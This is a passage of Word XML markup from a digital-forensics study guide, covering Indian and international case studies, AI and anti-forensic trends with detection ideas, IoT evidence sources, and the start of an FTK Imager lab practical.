          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">how another expert could repeat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> your work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.10 Case Studies — Indian and International</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339"/>
        <w:gridCol w:w="4093"/>
        <w:gridCol w:w="3314"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="233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Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="409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happened</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Forensic lesson</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Parliament attack, India (2001) — State v. Navjot Sandhu</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Terrorists attacked Parliament. Evidence included mobile phone call records and a laptop containing forged documents.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Showed the importance of electronic records in terrorism cases. Its view on admissibility without a certificate was later corrected by the Supreme Court in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Anvar P.V. (2014)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">.</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Mumbai attacks, India (2008)</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Attackers used mobile phones, satellite phone and internet-based (VoIP) calls to communicate with handlers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Call-data records, handset analysis and tracing of VoIP and internet activity were central; cross-border evidence needs international cooperation.</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Anvar P.V. v. P.K. Basheer (2014) and Arjun Panditrao Khotkar (2020)</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Supreme Court judgments on electronic evidence.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Certificate under Section 65B is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">mandatory</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> for secondary electronic evidence (e.g. printouts, CDs). A properly prepared certificate is part of the investigator’s work.</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Cosmos Bank cyber-attack, Pune (2018)</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Attackers compromised the bank’s systems, installed malware on the ATM switching system and made huge fraudulent withdrawals (about ₹94 crore) across countries.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Combination of malware analysis, network logs and international bank-transaction tracing; shows need for quick coordination with banks and agencies.</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AIIMS Delhi ransomware (2022)</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Hospital servers were encrypted; services disrupted for days.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Incident response, backups and segmentation in critical infrastructure; need for CERT-In coordination.</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BTK killer, USA (2005)</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offender sent a floppy disk to police. The Word document on it contained </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">metadata</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> with a name and a church’s name.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Metadata can identify a suspect even when the content does not — a classic example of Locard’s principle.</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Silk Road (2013)</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Dark-web marketplace founder arrested while his laptop was open.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Live acquisition, operator errors, blockchain analysis.</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Sony Pictures hack (2014)</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Attackers stole and leaked data and wiped systems with destructive malware.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Importance of log retention, malware analysis and attribution caution.</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WannaCry (2017)</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Worm using an SMB vulnerability spread worldwide, encrypting systems, including hospitals.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Rapid containment, patch management, kill-switch discovery through malware analysis.</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Equifax breach (2017)</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Attackers exploited an unpatched web-application vulnerability and stole personal data of millions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Patch management, log visibility and certificate expiry hampered detection.</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SolarWinds (2020)</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Attackers inserted malicious code into a software update, giving access to many organisations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Supply-chain attacks; need for long-term log retention and threat hunting.</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How to use case studies in exams</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">For each case, remember </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">one sentence on what happened</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one forensic lesson</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (evidence type, legal point or response lesson). Always connect the lesson to a concept you studied, for example </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">metadata</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Section 65B</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live acquisition</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">patch management</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.11 Emerging Trends</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Artificial intelligence in forensics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411"/>
        <w:gridCol w:w="6335"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>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Use of AI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="633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Examples</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="341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Triage and classification</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Automatically sorting millions of files and images; detecting illegal or relevant content faster than humans</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="341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Text and chat analysis (NLP)</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Finding key topics, names, languages and sentiment in large message collections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="341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Anomaly detection in logs and networks</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Learning normal behaviour and flagging beaconing, unusual logins or exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="341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Malware classification</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Grouping samples into families by behaviour or code similarity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3411"/>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Media forensics</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Detecting </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">deepfakes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, tampered images or voice cloning; face and speech recognition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3411"/>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Report assistance</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Summarising timelines and drafting initial text for human review</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Challenges:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> results must be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">explainable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and validated; models can be biased or wrong; adversaries use AI (deepfakes, AI-written phishing, adaptive malware); courts require reliable, reviewable methods — so a human expert must always verify and take responsibility.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Anti-forensic techniques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Offenders use techniques to hide, destroy or mislead digital evidence. Investigators need to expect them.</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3898"/>
        <w:gridCol w:w="3411"/>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Techniques</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Detection ideas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Data destruction</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Secure delete and wiping tools, disk formatting, physical destruction</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Traces of wiping tools in prefetch/registry; unusual patterns in unallocated space; $LogFile and $UsnJrnl</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Data hiding</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Encryption, hidden volumes, steganography, alternate data streams, file extension changes, data in slack space</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Signature analysis, entropy analysis, ADS listing, steganalysis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Trail obfuscation</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 clearing, timestomping, spoofed IP/MAC, VPN/Tor/proxy chains, clearing browser and bash history</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Log-cleared events (1102, 104), cross-checking with other logs, network and cloud logs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Evasion of analysis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Fileless malware</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, living-off-the-land tools (PowerShell, WMI), packers, anti-VM and anti-debug tricks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="341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Memory forensics, PowerShell logging, behavioural analysis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Attacks on tools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Malformed files that crash forensic tools; exploiting weaknesses in analysis software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="341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Validated and updated tools; use of a second tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">IoT forensics — overview</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Internet of Things (IoT)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> includes smart cameras, speakers, TVs, doorbells, wearables, fitness bands, smart-home hubs, connected cars and industrial sensors. They record location, voice, movement, health data and activity, and can be evidence — or be hacked and used in attacks (for example, botnets of cameras).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4873"/>
        <w:gridCol w:w="4873"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>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Evidence sources</w:t>
            </w:r>
          </w:p>
        </w:tc>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Challenges</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The device itself</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — firmware, flash memory, logs (may need chip-off or debug ports such as UART/JTAG)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Variety</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — thousands of makers, operating systems and file formats</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Companion mobile app</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — paired phone holds history and settings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Proprietary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> formats and limited tool support</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Cloud service</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — most data is stored by the vendor and needs legal process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Little storage / short log life</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — data is overwritten quickly</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Network traffic</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — router logs, packet captures of device communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Volatility and encryption</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">; no standard way to acquire; risk of altering a device by powering it</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Hubs and gateways</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> that collect device data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Jurisdiction and ownership</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> of cloud data; privacy of people in the home</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rPr>
          <w:cantSplit w:val="false"/>
        </w:trP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IoT evidence</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A smart doorbell, a fitness band and a smart speaker in the same house can together show when someone arrived, how active they were, and what commands were spoken. Each device has a different data format and storage location, which is why IoT investigations need careful planning and time synchronisation across devices.</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Lab Practical Companion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Your syllabus also lists eight sample practicals and a capstone. This section links each practical to the theory in this document and gives short, model answers to the observation questions, so that you can prepare for lab viva and exams. Always write the answers in your own words and match them to what you actually observed in the lab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 1 — Evidence Acquisition with FTK Imager</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Theory to revise:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> order of volatility, RAM capture, write blockers, imaging, hashing, chain of custody (Sections 1.7, 2.2–2.7, 2.11).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Capture RAM first (File → Capture Memory), save to external storage and note the file size.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attach the USB through a write blocker; create an E01 image with case details.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify images after creation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; save the verification report (matching MD5/SHA-1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Fill in the chain-of-custody form (evidence ID, hashes, tool and version, examiner, time).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="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Q1. You accidentally boot from the suspect USB before imaging. What changes?</w:t>
